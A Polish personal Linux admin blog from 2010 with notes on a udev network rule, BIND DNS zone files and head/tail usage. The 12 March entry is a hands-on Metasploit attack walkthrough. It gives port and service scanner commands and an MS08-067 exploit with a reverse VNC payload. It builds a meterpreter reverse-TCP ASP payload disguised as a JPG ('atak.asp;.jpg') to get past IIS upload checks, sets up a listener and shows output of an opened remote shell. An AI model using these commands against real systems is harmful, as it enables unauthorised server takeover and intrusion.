środa, 24 marca 2010

eth0 nie działa wskakuje eth1

/etc/udev/rules.d/????-net.rules


zmień mac na właściwy

np:

SUBSYSTEM=="net", DRIVERS=="?*", ATTRS{address}=="00:50:56:ae:20:ec", NAME="eth0"

wtorek, 16 marca 2010

DNS bind

/etc/bind/named.conf

zone "tychy24.pl" {
type master;
file "/etc/bind/tychy24.pl";
};
zone "26.241.248.195.in-addr.arpa" IN {
type master;
file "/etc/bind/pl.tychy24";
allow-update { none; };
allow-transfer { any; };
};

/etc/bind/tychy24.pl

$TTL 86400
@ IN SOA ns.tychy24.pl. your.email.here (
901 ; Serial
10800 ; Refresh
3600 ; Retry
604800 ; Expire
86400 ) ; Minimum

tychy24.pl. IN NS ns.tychy24.pl.
ns.tychy24.pl. IN A 195.248.241.26
ns1.tychy24.pl. IN A 195.248.241.26
ns2.tychy24.pl. IN A 195.248.241.26
dns.tychy24.pl. IN A 195.248.241.26
dns1.tychy24.pl. IN A 195.248.241.26
dns2.tychy24.pl. IN A 195.248.241.26
tychy24.pl. IN A 195.248.241.26
mail.tychy24.pl. IN A 195.248.241.26
smtp.tychy24.pl. IN A 195.248.241.26
webmail.tychy24.pl. IN A 195.248.241.26
ftp.tychy24.pl. IN CNAME tychy24.pl.
www.tychy24.pl. IN CNAME tychy24.pl.
tychy24.pl. IN MX 10 mail.tychy24.pl.
* IN A 195.248.241.26

/etc/bind/pl.tychy24


$TTL 86400
$ORIGIN 26.241.248.195.in-addr.arpa.
@ IN SOA ns1.tychy24.pl. ns2.tychy24.pl. (
2010031613
3H
15M
1W
1D )
26.241.248.195.in-addr.arpa. IN NS ns1.tychy24.pl.

26.241.248.195.in-addr.arpa. IN PTR ns.tychy24.pl.
26.241.248.195.in-addr.arpa. IN PTR ns1.tychy24.pl.
26.241.248.195.in-addr.arpa. IN PTR ns2.tychy24.pl.
26.241.248.195.in-addr.arpa. IN PTR dns.tychy24.pl.
26.241.248.195.in-addr.arpa. IN PTR dns1.tychy24.pl.
26.241.248.195.in-addr.arpa. IN PTR dns2.tychy24.pl.
26.241.248.195.in-addr.arpa. IN PTR tychy24.pl.
26.241.248.195.in-addr.arpa. IN PTR mail.tychy24.pl.
26.241.248.195.in-addr.arpa. IN PTR smtp.tychy24.pl.
26.241.248.195.in-addr.arpa. IN PTR webmail.tychy24.pl.

piątek, 12 marca 2010

METASPLOIT

BT4

- skanowanie podsieci porty 80

./pentest/exploits/framework3/msfconsole

use scanner/portscan/syn

set PORTS 80

set RHOSTS 192.168.0.0/24

set THREADS 10

run


- wersja systemu

use scanner/smb/version

- MSSQL

use scanner/mssql/mssql_ping

- skanowanie idle

use scanner/ip/ipidseq

- skanowanie ssh

use scanner/ssh/ssh_version

- anonimowe FTP

use scanner/ftp/anonymouse

- SNMP

use scanner/snmp/community

- podsłuchiwanie haseł pop3,imap,ftp,http

use auxiliary/sniffer/psnuffle


- przejęcie komputera z WINDOWS

use windows/smb/ms08_067_netapi

set RHOST 10.32.1.171 - cel

set lhost 10.32.1.85 - napastnik

set payload windows/vncinject/reverse_tcp

exploit


-----------------------------------------------------------------------------------------------

Do wygenerowania złośliwego kodu ASP posłużą nam następujące polecenia:
msfpayload windows/meterpreter/reverse_tcp \
LHOST=10.20.30.40 LPORT=8443 R | \
msfencode -t asp -o atak.asp


$ msfconsole
msf> use exploit/multi/handler
msf (handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf (handler) > set LHOST 10.20.30.40
msf (handler) > set LPORT 8443
msf (handler) > set ExitOnSession false
msf (handler) > exploit -j

Po utworzeniu listenera oczekującego na połączenie, możemy już utworzyć testowy plik w jego ostatecznej postaci, za pomocą polecenia:
cat saint.jpg atak.asp > "atak.asp;.jpg"

Jak widać, nasz skrypt został połączony z plikiem JPG (w celu oszukania mechanizmów sprawdzania zawartości pliku) oraz nazwany atak.asp;.jpg (co pozwala na wykorzystanie właściwej luki serwera IIS w sposobie interpretacji nazw plików).

Teraz pozostaje już tylko załadowanie naszego pliku na serwer poprzez odpowiedni formularz (odpowiednia nazwa oraz zawartość graficzna pozwolą na obejście podstawowych mechanizmów zabezpieczających), a następnie wyświetlenie strony internetowej zawierającej załadowany uprzednio plik. Jeśli katalog do którego trafił nasz plik dysponuje prawami wykonania, złośliwy skrypt ASP zostanie wykonany. To z kolei spowoduje nawiązanie połączenie z przygotowanym wcześniej listenerem:

[*] Starting the payload handler...
[*] Started reverse handler on port 8443
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened

Następnie, po wydaniu w konsoli listenera polecenia:
msf exploit(handler) > sessions -i 1
oraz w kolejnej konsoli polecenia:
meterpreter > shell
otrzymamy ostatecznie wiersz poleceń docelowego serwera:

Process 2668 created.
Channel 1 created.
wMicrosoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\serwer>

-----------------------------------------------------------------------------------------------

http://www.hcsl.pl/2010/03/wamanie-do-win-xp-sp3-poprzez-ie.html

-----------------------------------------------------------------------------------------------

http://www.hcsl.pl/search/label/Testy%20penetracyjne

-----------------------------------------------------------------------------------------------


wtorek, 2 marca 2010

W jaki sposób wyświetlić określoną ilość wierszy z pliku ?

Pobieramy 10 linii z początku pliku:
head /root/plik -n 10


Pobieramy 10 linii z końca pliku:
tail /root/plik -n 10